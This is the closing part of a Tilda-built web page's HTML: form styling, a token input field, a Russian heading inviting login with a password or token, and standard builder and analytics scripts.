                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    textarea::-webkit-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    textarea::-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    textarea:-moz-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }
                  #rec494444422
                    .tn-elem[data-elem-id="1664107318417"]
                    textarea:-ms-input-placeholder {
                    color: #000;
                    opacity: 0.5;
                  }</style
                ><style>
                  .tn-form_horiz .t-section__topwrapper {
                    margin-bottom: 75px;
                  }
                  .tn-form_horiz .t-section__title {
                    margin-bottom: 30px;
                  }
                  .tn-form_horiz .t-section__descr {
                    max-width: 560px;
                  }
                  .tn-form_horiz.t-form_inputs-total_5 .t-input-group {
                    width: 20%;
                  }
                  .tn-form_horiz.t-form_inputs-total_4 .t-input-group {
                    width: 25%;
                  }
                  .tn-form_horiz.t-form_inputs-total_3 .t-input-group {
                    width: 33.33%;
                  }
                  .tn-form_horiz.t-form_inputs-total_2 .t-input-group {
                    width: 50%;
                  }
                  .tn-form_horiz.t-form_inputs-total_1 .t-input-group {
                    width: 100%;
                  }
                  .tn-form_horiz .t-form__inputsbox {
                    display: table;
                    -webkit-transition: max-height 0.3s
                        cubic-bezier(0.19, 1, 0.22, 1),
                      opacity 0.3s linear;
                    transition: max-height 0.3s cubic-bezier(0.19, 1, 0.22, 1),
                      opacity 0.3s linear;
                    max-height: 5000px;
                  }
                  .tn-form_horiz__inputsbox_hidden.t-form__inputsbox {
                    display: block;
                    overflow: hidden;
                    max-height: 0px;
                    opacity: 0;
                  }
                  .tn-form_horiz .t-input-group {
                    display: table-cell;
                    vertical-align: bottom;
                  }
                  .tn-form_horiz .t-input-block {
                    height: 100%;
                    width: 100%;
                    box-sizing: border-box;
                  }
                  .tn-form_horiz .t-input-title {
                    padding-bottom: 5px;
                  }
                  .tn-form_horiz .t-input-subtitle {
                    margin-top: -5px;
                    padding-bottom: 10px;
                  }
                  .tn-form_horiz .t-form__submit,
                  .tn-form_horiz .tn-form__submit {
                    display: table-cell;
                    vertical-align: bottom;
                    height: 100%;
                  }
                  .tn-form_horiz .t-datepicker {
                    width: 100%;
                  }
                  .tn-form_horiz .t-form_bbonly .t-input-title {
                    padding-bottom: 0;
                    margin-bottom: 0;
                  }
                  .tn-form_horiz .t-form_bbonly .t-input-subtitle {
                    padding-bottom: 0;
                    padding-top: 5px;
                  }
                  .tn-form_horiz .t-input-error {
                    display: none !important;
                  }</style
                ><style>
                  .tn-atom .t-input-block {
                    position: relative;
                  }
                </style>
              </div>
              <!--googleoff: all--><!--noindex-->
              <div
                data-nosnippet="true"
                class="tn-atom__inputs-wrapp"
                style="display: none"
              >
                <textarea class="tn-atom__inputs-textarea">
{"0":{"lid":"1531306540094","ls":"10","loff":"","li_type":"in","li_ph":"Token","li_req":"y","li_nm":"Input"}}</textarea
                >
              </div>
              <!--/noindex--><!--googleon: all-->
            </div>
            <div
              class="t396__elem tn-elem tn-elem__4944444221664107397170 t-animate t-animate_started"
              data-elem-id="1664107397170"
              data-elem-type="text"
              data-field-top-value="25"
              data-field-left-value="141"
              data-field-width-value="919"
              data-field-axisy-value="top"
              data-field-axisx-value="left"
              data-field-container-value="grid"
              data-field-topunits-value="px"
              data-field-leftunits-value="px"
              data-field-heightunits-value=""
              data-field-widthunits-value="px"
              data-animate-style="zoomin"
              data-animate-duration="0.7"
              data-animate-scale="0.5"
              data-fields="top,left,width,container,axisx,axisy,widthunits,leftunits,topunits"
              style="
                top: 210.5px;
                left: 492.5px;
                width: 919px;
                transform: scale(0.5);
                transition-duration: 0.7s;
              "
            >
              <div
                class="tn-atom"
                field="tn_text_1664107397170"
                style="line-height: 67px"
              >
                Войдите с помощью пароля или токена
              </div>
            </div>
          </div>
        </div>
        <script>
          t_onReady(function () {
            t_onFuncLoad("t396_init", function () {
              t396_init("494444422");
            });
          });
        </script>
        <!-- /T396 -->
      </div>
    </div>
    <!-- Stat -->
    <script type="text/javascript">
      if (!window.mainTracker) {
        window.mainTracker = "tilda";
      }
      setTimeout(function () {
        (function (d, w, k, o, g) {
          var n = d.getElementsByTagName(o)[0],
            s = d.createElement(o),
            f = function () {
              n.parentNode.insertBefore(s, n);
            };
          s.type = "text/javascript";
          s.async = true;
          s.key = k;
          s.id = "tildastatscript";
          s.src = g;
          if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
          } else {
            f();
          }
        })(
          document,
          window,
          "548e0b4d0fc9f37acb3867c6d0491dd9",
          "script",
          "https://static.tildacdn.info/js/tilda-stat-1.0.min.js"
        );
      }, 2000);
    </script>
    <script class="t-zero-forms-s" id="errorBoxScriptInit">
      document.addEventListener("click", function (e) {
        if (
          e.target.closest(".js-errorbox-close") &&
          e.target.closest(".tn-atom")
        ) {
          e.target.parentNode.style.display = "none";
        }
      });
    </script>
  </body>
</html>
